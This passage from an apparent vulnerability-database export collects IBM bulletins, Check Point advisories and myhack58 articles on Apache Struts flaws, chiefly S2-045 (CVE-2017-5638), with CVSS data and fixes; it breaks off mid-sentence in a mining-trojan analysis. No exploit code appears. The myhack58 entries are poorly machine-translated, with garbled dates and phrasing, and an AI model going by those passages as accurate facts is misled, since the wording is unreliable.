system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nJazz for Service Management version 1.1.0 - 1.1.3\n\n## Remediation/Fixes\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version | Affected Supporting Product Security Bulletin \n---|---|--- \nJazz for Service Management version 1.1.0 - 1.1.3 | Websphere Application Server Full Profile 8.5.5 | \n\n# [Security Bulletin: Multiple vulnerabilities in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) \n \n## Workarounds and Mitigations\n\nPlease refer to WAS iFix\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-11-28T11:00:02", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI shipped with Jazz for Service Management", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1007", "CVE-2014-0114", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-11-28T11:00:02", "id": "88E396C29AABC664ACC3D5B0A3797EDDA0587772D5D9F452A2E356E7CC5BCD5D", "href": "https://www.ibm.com/support/pages/node/741907", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-13T09:35:19", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Case Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Security Bulletin: Multiple vulnerabilities in Apache Struts and Apache Commons that is used by WebSphere Application Server UDDI](<http://www.ibm.com/support/docview.wss?uid=swg22016214>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Versions\n\n| Affected Supporting Product and Versions \n---|--- \nIBM Case Manager 5.1.1 \nIBM Case Manager 5.2.0 \nIBM Case Manager 5.2.1 \nIBM Case Manager 5.3.0 \nIBM Case Manager 5.3.1 \nIBM Case Manager 5.3.2 \nIBM Case Manager 5.3.3 | IBM WebSphere Application Server 7.0 \nIBM WebSphere Application Server 8.0 \nIBM WebSphere Application Server 8.5 \nIBM WebSphere Application Server 9.0 \n \n## ", "cvss3": {}, "published": "2018-07-10T22:09:09", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities has been identified in IBM WebSphere Application Server shipped with IBM Case Manager (CVE-2014-0114, CVE-2016-1181, CVE-2016-1182, CVE-2012-1007)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1007", "CVE-2014-0114", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-07-10T22:09:09", "id": "68E7DB3D7E398B2706226213F9B1A94ACD374A065EE9538BCE2CF140B065CB08", "href": "https://www.ibm.com/support/pages/node/713521", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-27T21:50:37", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM Security Key Lifecycle Manager (SKLM). Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) | WebSphere Application Server Version \n---|---|--- \nIBM Security Key Lifecycle Manager | 4.0 | 9.0.5 \nIBM Security Key Lifecycle Manager | 3.0.1 | 9.0.0.5 \nIBM Security Key Lifecycle Manager | 3.0 | 9.0.0.5 \nIBM Security Key Lifecycle Manager | 2.7 | 9.0.0.1 \n \n## Remediation/Fixes\n\nPlease consult the following bulletins: \n\n[Security Bulletin: Potential vulnerability in WebSphere Application Server (CVE-2015-0899)](<https://www.ibm.com/support/pages/security-bulletin-potential-vulnerability-websphere-application-server-cve-2015-0899> \"Security Bulletin: Potential vulnerability in WebSphere Application Server \\(CVE-2015-0899\\)\" ) \n[Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<https://www.ibm.com/support/pages/security-bulletin-classloader-manipulation-vulnerability-ibm-websphere-application-server-cve-2014-0114> \"Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114\" ) \n[Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-apache-struts-affects-ibm-websphere-application-server-cve-2016-1181-and-cve-2016-1182> \"Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server \\(CVE-2016-1181 and CVE-2016-1182\\)\" )\n\nfor vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2020-09-26T18:24:35", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) (CVE-2015-0899, CVE-2014-0114, CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114", "CVE-2015-0899", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2020-09-26T18:24:35", "id": "EB488D986A623E81C07D5F38DFFA754649938084B72DDAA698DEA6B41BB73C49", "href": "https://www.ibm.com/support/pages/node/6338461", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:38:57", "description": "## Summary\n\nIBM Sterling File Gateway has addressed the following vulnerabilities caused by Apach Struts 1.1\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2008-2025](<https://vulners.com/cve/CVE-2008-2025>)** \nDESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/49712> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n**CVEID:** [CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [CVE-2015-0899](<https://vulners.com/cve/CVE-2015-0899>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the MultiPageValidator implementation. An attacker could exploit this vulnerability using a modified page parameter to bypass restrictions and launch further attacks on the system. This vulnerability also affects other products. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/101770> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2016-1181](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113852> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2016-1182](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113853> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Sterling File Gateway 2.2 \n\n## Remediation/Fixes\n\n**PRODUCT &amp; Version **\n\n| \n\n**APAR**\n\n| \n\n**Remediation/Fix** \n \n---|---|--- \nIBM Sterling File Gateway 2.2 | IT23546| \n\nApply Fix Pack 5020603_5 available on [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2020-02-05T00:53:36", "type": "ibm", "title": "Security Bulletin: Multiple Apache Struts Vulnerabilities Affect IBM Sterling File Gateway", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2025", "CVE-2014-0114", "CVE-2015-0899", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2020-02-05T00:53:36", "id": "1A977E1D46AE4CB4B7068DB341125931FAD75C28D6703503973FFF9BE917887F", "href": "https://www.ibm.com/support/pages/node/301983", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:33:37", "description": "A remote code execution vulnerability exists in the Apache Struts2 using Jakarta multipart parser. An attacker could exploit this vulnerability by sending an invalid content-disposition as part of a file upload request. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-08-09T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts 2 Content-Disposition Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-08-29T00:00:00", "id": "CPAI-2017-0676", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-04T10:32:49", "description": "A remote code execution vulnerability exists in Apache Struts2. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 Content-Type Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-09-28T00:00:00", "id": "CPAI-2017-0197", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:31:47", "description": "A remote code execution vulnerability exists within Oracle WebLogic WLS. This is due to the way Oracle WebLogic handles xml decodes. A successful attack could lead to a remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-27T00:00:00", "type": "checkpoint_advisories", "title": "Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271; CVE-2017-3506)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2017-3506"], "modified": "2018-03-06T00:00:00", "id": "CPAI-2017-1088", "href": "", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "myhack58": [{"lastseen": "2017-03-16T03:17:43", "description": "Author: janes(know Chong Yu 404 laboratory)\n\nDate: 2017-03-15\n\n## Background description\n\nStruts2 official to GMT 2017 3 December 6, 10pm published Struts2 there is a remote code execution vulnerability vulnerability number S2-045, CVE number: CVE-2017-5638, and rated as high-risk vulnerabilities. Because the vulnerability affects a wide range of\uff08Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10, the vulnerability degree of harm is severe, you can directly access the application system of the server where the control limit, and 3 on 7 May in the morning on the Internet on the outflow of the vulnerability of the PoC and Exp,so, S2-045 vulnerability in the Internet on the impact of rapid expansion, by the Internet companies and the government attach great importance. From vulnerability announcement to now(3.6-3.15)has been more than a week, so take this opportunity to analyze S2-045 in the social media Twitter and on Sina Weibo heat distribution.\n\n## Data acquisition\n\nIf you want to analyze Twitter and on Sina Weibo, S2-045 vulnerability of the heat distribution, then you need to get Twiiter and Facebook on the data, with the data speak. So they use\u201cselenium+phantomjs\u201dgo crawling the data via Twitter and Sina Weibo web page to the search interface, respectively, search for the keyword\u201cs2-045\u201dand\u201cCVE-2017-5638\u201d, then the search results go to the weight and finishing, taking to Twitter and Facebook, the time display of the time zone inconsistencies, using the same crawl page timestamp and then converted to the local time of the way of a unified time zone issues, the crawling data in the time to 2017 year 3 month 14 days afternoon 18 when, the results as shown below.\n\n* Twitter! [](/Article/UploadPic/2017-3/2017316104811455. png)\n\n* Sina Weibo! [](/Article/UploadPic/2017-3/2017316104812512. png)\n\n## Heat analysis\n\nStatistics daily S2-045 vulnerability in the Twitter and on Sina Weibo, the number of occurrences, to obtain the following table, Twitter, the CCP appears 73 times, Sina Weibo, the CCP appears 45 times. On the dissemination of the amount of data, S2-045 vulnerability of the data amount is not large, this reflected from the side of the security vulnerabilities of the information and not by the majority of the people of concern, mainly in the security circle propagation.\n\n| Social media | 3 December 7 | 3 8 March | 3 April 9 | 3 October 10 | 3 11 March | 3 November 12 | 3 13 February | 3 March 14 \n---|---|---|---|---|---|---|---|--- \nTwitter| 16 | 3 | 7 | 15 | 6 | 11 | 15 | 0 \nSina Weibo| 23 | 8 | 7 | 3 | 0 | 0 | 1 | 3 \n\n! [](/Article/UploadPic/2017-3/2017316104812815. png)\n\nUsing the above table of data, production of graphics, get as on the heat distribution from the figure it can be seen:\n\n* 3 month 6 day before the announcement of the S2-045 vulnerability, 3 on 7, on Twitter and on Sina Weibo, the occurrence of the outbreak spread, which is likely to and vulnerabilities of the PoC and Exp in 3 month 7 days you on the Internet widely spread about;\n* Sina Weibo, S2-045 vulnerability to the heat distribution of the overall downward state, in the peak in 3 month 7 days, while Twitter as a whole was undulating trend, 3 on 7th, 3 on 10th and 3 on 13 September are peak;\n* Sina Weibo and Twitter for both the overall potential is not the same, and in 3 on the 7th, Sina Weibo and Twitter are data of the highest peak, but Sina Weibo, the amount of data than Twitter.\n\nThere may be several reasons could explain this phenomenon:\n\n* S2-045 vulnerability is the Chinese found that, 3 on 6 September evening, the official publication of the vulnerability, 3 on 7 on the morning of the vulnerabilities of the PoC and Exp in domestic Internet flow out, by domestic security company-wide attention, this also would explain the 3 on 7 The New Wave of microblogging amount of data over the Twitter phenomenon;\n* Due to the S2-045 vulnerability to serious harm, and quickly spread out of PoC and Exp, and therefore, 3 on 7 August, the domestic security companies will quickly start the emergency response, other Internet companies also in self-examination and patch S2-045 vulnerability, with the vulnerability of repair, on Sina Weibo, the attention naturally reduces, the overall will show a downward trend;\n* Twitter user distribution of a wide range of countries or regions affected by the S2-045 the influence is different, therefore trends appear UPS and downs.\n\n3 December 7, Sina Weibo and Twitter are data peak, then the 3 on 7, data, time period distribution mapping as follows, As can be seen, the morning 8 When before, Sina Weibo and Twitter, the amount of data is 0, 8 to 10 period rooms began to appear, it seems, and working hours more in line with the, The and the data the peak occurred mainly in the afternoon 14 to 18 between, perhaps this is because PoC and Exp on the Internet widely spread, caused the Internet began to be mass attack(reference [HackerNews Struts2 vulnerability disclosure 24 hour](<http://hackernews.cc/archives/7371>)) to.\n\n! [](/Article/UploadPic/2017-3/2017316104812327. png)\n\nFinally, look at Twitter and Sina Weibo on on S2-045 vulnerability in the first message what time and by whom issued, and the results are shown in the following table. Twitter and Sina microblogging issued the first message is not the same person, but the transmission time difference is not much, visible at home and abroad to exploit the perceptual capacity is relatively quite.\n\nIbid., the times are Beijing time, according to the unix time stamp conversion.\n\nSocial media | time | nickname | real identity\n---|---|---|--- \nTwitter | 2017-03-07 09:29:00 | @amannk | \nSina Weibo | 2017-03-07 09:44:29 | gnaw0725 | nsfocus Brand Manager Wang Yang\n\n**[1] [[2]](<84379_2.htm>) [next](<84379_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "myhack58", "title": "The Struts S2-045 vulnerability heat analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "MYHACK58:62201784379", "href": "http://www.myhack58.com/Article/html/3/62/2017/84379.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T09:25:02", "description": "Recently, the national information security vulnerabilities library CNNVD received on the Apache Struts2 \uff08S2-045 remote code execution vulnerability CNNVD-201703-152 the case of the message send. Because the vulnerability affects a wide range of hazard level high, the national information security vulnerabilities library CNNVD for the tracking analysis, the situation is as follows: \nA, vulnerability introduction\nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework, mainly to provide two versions of the frame product: Struts 1 and Struts 2 of. \nApacheStruts 2.3.5 \u2013 2.3. 31 version and 2. 5 \u2013 2.5.10 version there is a remote code execution vulnerability CNNVD-201703-152, CVE-2017-5638 it. The vulnerability is due to the upload functionality of the exception handling function does not properly handle user input error information. Lead to a remote attacker by sending malicious packets that exploit the vulnerability in the affected on the server execute arbitrary commands. \nSecond, the vulnerability to hazards\nAn attacker can send malformed HTTP packet to exploit the vulnerability in the affected server to perform system commands, and further can completely control the server, causing a denial of service, data leakage, website creation tampering and other effects. Since the exploit without any pre-conditions such as open dmi, debug, and other functions, and enable any plugins, and therefore vulnerability to harm is more serious. \nThird, the repair measures\nCurrently, the Apache official has been directed to the vulnerabilities released a security announcement. Please the affected users to check whether or not affected by the vulnerability. \nSelf-examination manner\n\u7528\u6237 \u53ef \u67e5\u770b web \u76ee\u5f55 \u4e0b /WEB-INF/lib/ \u76ee\u5f55 \u4e0b \u7684 struts-core.x.x.jar file, if the version in Struts2. 3. 5 to Struts2. 3. 31 and Struts2. 5 to Struts2. 5. 10 between the presence of vulnerabilities. \nUpgrade repair\nAffected users can upgrade to version to Apache Struts 2.3.32 or Apache Struts 2.5.10.1 to eliminate the vulnerability. \nTemporary relief\nAs the user inconvenient to upgrade, may take the following temporary solution: \nl delete commons-fileupload-x. x. x. the jar file will cause the upload function is not available. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "About Apache Struts2\uff08S2-045\uff09vulnerability briefings-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784024", "href": "http://www.myhack58.com/Article/html/3/62/2017/84024.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-10T13:31:12", "description": "0\u00d71 Overview \nMany business websites use the Apache open source project to build a http server, which is most of the use of the Apache sub-project of Struts in. But since the Apache Struts2 Product code there are more risks, beginning in 2007, Struts2 will frequently broke multiple high-risk vulnerabilities. \nFrom the Apache official data, from 2007 to 2018 total published number S2-001 to S2-056 total of 56 vulnerabilities, of which only a remote code execution vulnerability Remote Code Execution on a 9. \n! [](/Article/UploadPic/2018-7/2018710164555841. png? www. myhack58. com) \n2017 3 months was reported out of the S2-045\uff08CVE-2017-5638 high-risk vulnerabilities, based on Jakarta Multipart parser implementation file upload may lead to an RCE, the impact of the range of the Struts 2.3.5 \u2013 Struts 2.3.31, as well as the Struts 2.5 \u2013 Struts 2.5.10 version, persists to be utilized for an attack. \n2018 year 4 months Tencent Yu see Threat Intelligence Center had been monitoring the hacker group exploit this vulnerability bulk of the invasion[the web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)implantation mining Trojan\uff08for more details, see the enterprise not fix Apache Struts 2 vulnerability-induced[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)is the bulk of the invasion article, the recent Royal to see the Threat Intelligence Center is again monitored a similar attack. \nThis attack, hackers use attack tools WinStr045 detecting the presence on the network vulnerability[web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), found that the presence of vulnerability of the machine through a remote execution of various types of instruction provide the right to, create, account, system information gathering, and then will be used to download the Trojan mas. exe the implant, then the use of mas. exe this Trojan Downloader from the plurality of C&amp;C;address to download more Trojans: the \u5229\u7528\u63d0\u6743\u6728\u9a6co3/o6.exe and \u6316\u77ff\u6728\u9a6cnetxmr4.0.exe the. \nSince the bitcoin mining Trojan netxmr the decryption code after the module name\u201ckoi\u201dis loaded, therefore, Tencent Yu see Threat Intelligence Center will be named for KoiMiner it. Interestingly, intruders to ensure your mining success, it will check the system processes, CPU resource consumption, and if CPU usage exceeds 40%, it will be the end of the Run, will save the system resources for the mining of. \nAccording to the code traceability analysis, Tencent Yu see Threat Intelligence Center researchers believe that this KoiMiner series mining Trojan is probably some hacker forums, underground mining organizations to share in the community more people cooperation of the\u201cpractice\u201dworks. \n! [](/Article/UploadPic/2018-7/2018710164555994. png? www. myhack58. com) \nAttack process \nNote: Struts is based on MVC design pattern Web application framework, the user use of the framework can be business logic code from the presentation layer clearly separated, so as to focus on the business logic and the mapping relationship between the configuration file. Struts2 is Struts and WebWork combination, a combination of Struts and WebWork advantages, the use of interceptor mechanisms to process the user's request, so that business logic can with ServletAPI completely out of the opening. \n0\u00d72 a detailed analysis of the \n0 x 2.1 intrusion \nThe detection of the target system whether the presence of S2-045 vulnerability \n! [](/Article/UploadPic/2018-7/2018710164555176. png? www. myhack58. com) \nThe presence of the vulnerability of the system to attack \n! [](/Article/UploadPic/2018-7/2018710164555748. png? www. myhack58. com) \nInvasion tool for the selection of osmotic command \n! [](/Article/UploadPic/2018-7/2018710164555749. png? www. myhack58. com) \nThe invasion can be selected when execution of the 